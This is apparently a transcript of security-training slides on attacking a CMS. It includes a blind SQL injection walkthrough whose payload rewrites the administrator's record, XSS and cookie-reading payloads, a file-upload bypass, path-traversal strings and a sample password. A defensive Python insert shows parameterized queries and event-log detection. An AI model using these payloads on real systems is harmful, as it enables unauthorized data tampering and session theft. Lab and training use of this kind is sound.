Security Breach: Detecting and Exploiting SQL Injection in Contact Groups


Suspect a potential SQL injection in the macros used in Contact groups? Learn how to identify and exploit it through blind SQL injection techniques. Follow step-by-step instructions to execute a payload that alters user data and gain unauthorized access. Stay vigilant and proactively safeguard your data integrity.


Uploaded on Apr 02, 2024 | 3 Views



Presentation Transcript


  1. 1. Broken Access Control 3. Injection 4. Insecure Design

  2. { userId: 1, newPass: **** }

  3. We suspect that one of the macros used in Contact groups contains a SQL injection; try to find and exploit it! This is a blind SQL injection: you won't see the result in the response, but the injected query will execute in the background. If the query fails, the error is logged to the Event log.

  4. 1. Go to Contact Groups, create a new group and go to Conditions.
     2. Select the 'Contact has value in field' macro. It allows us to insert arbitrary input before the operator in the WHERE clause (e.g. WHERE <field> contains <value>). You can identify it by inserting `, recalculating the group and then checking the Event log.
     3. Final payload (change FirstName of the administrator account):
        1=1; UPDATE CMS_User SET FirstName='Joe' WHERE UserID = 53--
        - Finish the WHERE clause of the original query with any true statement, e.g. 1=1
        - Add ; to finish the first query
        - Arbitrary query to drop a table, dump data or anything
        - Comment out everything else with --
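The slide above relies on two facts a defender can act on: a macro that pastes the field value into the WHERE clause breaks on a stray quote (which is why the Event log shows the error), and a macro that binds the value as a parameter cannot be broken that way. The example below is added here and is not code from the presentation or from the CMS it describes; it uses an in-memory SQLite table with only the CMS_User columns the slide names, an allowlist of field names, and a few constructed Event-log lines, all of which are assumptions for the demonstration.

```python
import re
import sqlite3

# Constructed demo schema: only the CMS_User columns the slide touches.
# The real table has more columns; this is an assumption for the example.
SCHEMA = """
CREATE TABLE CMS_User (UserID INTEGER PRIMARY KEY, FirstName TEXT, Email TEXT);
INSERT INTO CMS_User VALUES (53, 'Admin', 'administrator@localhost.local');
INSERT INTO CMS_User VALUES (54, 'Joe', 'joe@localhost.local');
"""

# Columns the 'Contact has value in field' condition is allowed to reference.
# Field names cannot be bound as parameters, so an allowlist is the control.
ALLOWED_FIELDS = {"FirstName", "Email"}

PROBE = "'"  # the single quote used to confirm that input reaches the SQL text
PAYLOAD = "1=1; UPDATE CMS_User SET FirstName='Joe' WHERE UserID = 53--"  # slide 4


def fresh_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_query(conn, field, value):
    """Macro-style string concatenation: the value lands in the WHERE clause
    verbatim, so a stray quote breaks the statement and surfaces as a database
    error. Returns (rows, error_text); error_text is what the Event log records."""
    sql = f"SELECT UserID FROM CMS_User WHERE {field} LIKE '%{value}%'"
    try:
        return [row[0] for row in conn.execute(sql)], None
    except sqlite3.OperationalError as exc:
        return [], str(exc)


def hardened_query(conn, field, value):
    """Field name checked against the allowlist, value bound as a parameter,
    so user input is only ever compared as data and never parsed as SQL."""
    if field not in ALLOWED_FIELDS:
        raise ValueError(f"field not allowed: {field!r}")
    sql = f"SELECT UserID FROM CMS_User WHERE {field} LIKE ?"
    return [row[0] for row in conn.execute(sql, (f"%{value}%",))]


def field_rejected(field):
    """True if the hardened builder refuses a field name outside the allowlist."""
    try:
        hardened_query(fresh_db(), field, "x")
        return False
    except ValueError:
        return True


def first_name(conn, user_id):
    row = conn.execute("SELECT FirstName FROM CMS_User WHERE UserID = ?", (user_id,))
    return row.fetchone()[0]


def demo():
    """Run the probe and the slide's payload through both builders."""
    conn = fresh_db()
    _, probe_error = vulnerable_query(conn, "FirstName", PROBE)
    return {
        "probe_logged_error": probe_error is not None,          # concat version breaks
        "hardened_probe_rows": hardened_query(conn, "FirstName", PROBE),
        "hardened_payload_rows": hardened_query(conn, "FirstName", PAYLOAD),
        "admin_first_name": first_name(conn, 53),               # unchanged: 'Admin'
    }


# Detection side: group recalculations that fail with a SQL syntax error are the
# signal the slide points at. Patterns are common SQL Server / SQLite messages.
SQL_ERROR = re.compile(r"syntax error|Incorrect syntax near|Unclosed quotation mark", re.I)

# Constructed sample Event-log lines, not a real export.
EVENT_LOG = [
    "2024-04-02 10:01:12 ContactGroup Recalculate OK group=VIP",
    "2024-04-02 10:02:40 ContactGroup Recalculate ERROR Incorrect syntax near ''. "
    "Unclosed quotation mark after the character string",
    "2024-04-02 10:03:05 ContactGroup Recalculate OK group=Newsletter",
]


def suspicious_recalculations(lines):
    """Return recalculation entries whose error text looks like broken SQL."""
    return [line for line in lines if "Recalculate" in line and SQL_ERROR.search(line)]


if __name__ == "__main__":
    print(demo())
    print(suspicious_recalculations(EVENT_LOG))
```

The hardened builder treats the whole payload as a LIKE pattern, so it matches nothing and the administrator's FirstName stays untouched; the quote probe produces no error at all, which is exactly the behaviour that makes the Event-log check on the slide come back empty. Alerting on recalculation entries that carry a SQL syntax error is a cheap way to spot the probing step before anyone gets to the payload.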

  5. Event log user@localhost.local Pass.word1 Digital Channel Manager Users

  6. Users Roles Event log

  7. administrator Users

  8. Users email email queue

  9. Send us a message

  10. <img src=0 onerror=alert(1) /> Contact management

  11. http(s):// Forms application

  12. javascript:alert(document.cookie)

  13. file upload xml file Cafe

  14. /api/cmd allowedExtensions 3. Resend / edit change png to xml (/getmedia/.../payload.xml

  15. ../..

  16. ..\..\.
